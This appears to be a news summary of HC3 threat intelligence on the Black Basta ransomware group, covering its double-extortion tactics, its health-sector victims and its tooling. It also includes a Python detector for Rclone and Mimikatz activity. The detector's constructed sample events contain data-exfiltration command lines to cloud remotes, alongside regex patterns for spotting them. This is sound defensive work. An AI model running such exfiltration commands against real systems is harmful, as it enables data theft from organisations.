HC3 Shares Black Basta Ransomware Threat Intelligence Data
The Health Sector Cybersecurity Coordination Center (HC3) has shared threat intelligence information about the Black Basta ransomware group to help network defenders prevent and rapidly detect attacks in progress. The Black Basta group was first identified in April 2022 and is known to conduct ransomware and extortion attacks. The group engages in double extortion tactics, exfiltrating sensitive data and encrypting files, then issues threats to publish the data on its data leak site if the ransom is not paid. The group is also known to conduct extortion-only attacks without file encryption.
While the group has only been in operation for a relatively short time, it is clear that the group has extensive experience in ransomware attacks, as in the first two weeks of operation the group is known to have conducted at least 20 ransomware attacks. The Russian-speaking threat group is believed to include former members of the Conti and BlackMatter ransomware operations and uses similar tactics, techniques, and procedures to those groups and is thought to have links to the FIN7 threat group. It is highly probable that the group has conducted ransomware attacks in the past under a different name, with some security researchers believing Black Basta is a rebrand of Conti. Conti was officially disbanded in May 2022 and it is thought that the group split into several smaller operations.
Black Basta consists of highly capable individuals well-versed in conducting ransomware attacks. The group has conducted attacks on several organizations in the healthcare and public health (HPH) sector, including health information technology companies, healthcare industry service providers, laboratories and pharmaceutical firms, and health plans. The vast majority of its victims are located in the United States, although the group has started conducting attacks in other countries, primarily the Five Eyes countries (USA, Australia, Canada, New Zealand, and the United Kingdom).
Black Basta is known for carefully choosing its targets and has attacked many critical infrastructure entities. The attacks are believed to be financially motivated, rather than linked to the Russian government, although it is possible that the group also has some sort of political agenda based on the countries that are typically targeted. The group does not rely on one method of attack and often uses a unique approach in attacks on specific targets. The group is known to purchase access to systems from initial access brokers. Once access is gained, the group uses a variety of tools for remote access, privilege escalation, lateral movement, and data exfiltration, including Qakbot/QBot, SystemBC, Mimikatz, Cobalt Strike, and Rclone. Additional methods of access include the exploitation of vulnerabilities, Remote Desktop Protocol, phishing, web injections, malicious downloads, and repackaged/infected software installers.
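Two of the tools named above, Rclone (data exfiltration) and Mimikatz (credential theft), are the kind of thing a defender can watch for in process-creation telemetry. The following is an added example, not part of the HC3 analysis or of this article, showing a small detector run over constructed process-creation events with Sysmon-style fields. The events, the host allow-list (a hypothetical backup server `bkp-01` where Rclone is sanctioned) and the regular expressions are all assumptions of this example; it also goes slightly beyond the text by catching a renamed Rclone binary from the shape of its command line.

```python
"""
Toy detection over constructed process-creation events for two tools the HC3
summary attributes to Black Basta: Rclone (exfiltration) and Mimikatz
(credential theft). Field names mimic Sysmon Event ID 1; the events, the
allow-list and the regexes are this example's own assumptions.
"""
import re
from dataclasses import dataclass
from typing import Dict, List


@dataclass(frozen=True)
class ProcessEvent:
    host: str
    user: str
    image: str          # full path of the started executable
    command_line: str


# Assumed: the only host where Rclone is sanctioned is the backup server.
RCLONE_ALLOWED_HOSTS = {"bkp-01"}

# Rclone invoked by name with a transfer subcommand and a remote destination (name:path).
RCLONE_BY_NAME = re.compile(
    r"\brclone(?:\.exe)?\s+(?:copy|sync|move)\b.*?\s([A-Za-z0-9_-]{2,}):", re.I)
# Same command shape without the name, to catch a renamed binary. The two-character
# minimum on the remote name keeps Windows drive letters such as C: from matching.
TRANSFER_SHAPE = re.compile(
    r"\s(?:copy|sync|move)\s+\S+\s+([A-Za-z0-9_-]{2,}):", re.I)
MIMIKATZ = re.compile(r"mimikatz", re.I)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(ev: ProcessEvent) -> List[Dict[str, str]]:
    """Return zero or more findings for a single process-creation event."""
    findings: List[Dict[str, str]] = []
    name = basename(ev.image)
    m = RCLONE_BY_NAME.search(ev.command_line) or TRANSFER_SHAPE.search(ev.command_line)
    # Rclone by file name, or an Rclone-shaped transfer to a remote, outside the allow-list.
    if (name == "rclone.exe" or m) and ev.host not in RCLONE_ALLOWED_HOSTS:
        findings.append({
            "rule": "rclone_exfil",
            "host": ev.host, "user": ev.user,
            "detail": f"remote={m.group(1) if m else 'n/a'} image={name}",
        })
    # Mimikatz referenced in the image name or the command line.
    if MIMIKATZ.search(name) or MIMIKATZ.search(ev.command_line):
        findings.append({"rule": "credential_dumping_tool", "host": ev.host,
                         "user": ev.user, "detail": f"image={name}"})
    return findings


def detect(events) -> List[Dict[str, str]]:
    """Run classify() over a stream of events and flatten the findings."""
    return [f for ev in events for f in classify(ev)]


# Constructed sample telemetry (not real logs).
SAMPLE_EVENTS = [
    # Sanctioned backup job on the allow-listed host: no finding.
    ProcessEvent("bkp-01", "svc_backup", r"C:\Tools\rclone.exe",
                 r"rclone.exe sync D:\backups nas:backups"),
    # Rclone dropped in a user temp directory pushing a file share to a cloud remote.
    ProcessEvent("fs-02", "jdoe", r"C:\Users\jdoe\AppData\Local\Temp\rclone.exe",
                 r"rclone.exe copy \\fs-02\finance mega:finance --transfers 32"),
    # Renamed binary, same transfer shape: caught by TRANSFER_SHAPE.
    ProcessEvent("ws-17", "jdoe", r"C:\Windows\Temp\x.exe",
                 r"x.exe copy C:\Users\jdoe\Documents gdrive:docs"),
    # Mimikatz executed from a download directory.
    ProcessEvent("ws-17", "jdoe", r"C:\Users\jdoe\Downloads\mimikatz.exe", "mimikatz.exe"),
    # Ordinary local copy between drive letters: must not fire.
    ProcessEvent("ws-03", "alice", r"C:\Windows\System32\cmd.exe",
                 r"cmd /c copy C:\a.txt D:\b.txt"),
]

if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
```

The allow-list is what keeps this usable: Rclone is a legitimate backup tool, so the signal is Rclone (or something shaped like it) running where it is not expected, rather than its presence at all. In production the same logic would read from a SIEM rather than an inline list, and the remote name captured in `detail` is the pivot for the exfiltration investigation.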
You can view the full analysis of the group along with the recommended defensive measures and mitigations here.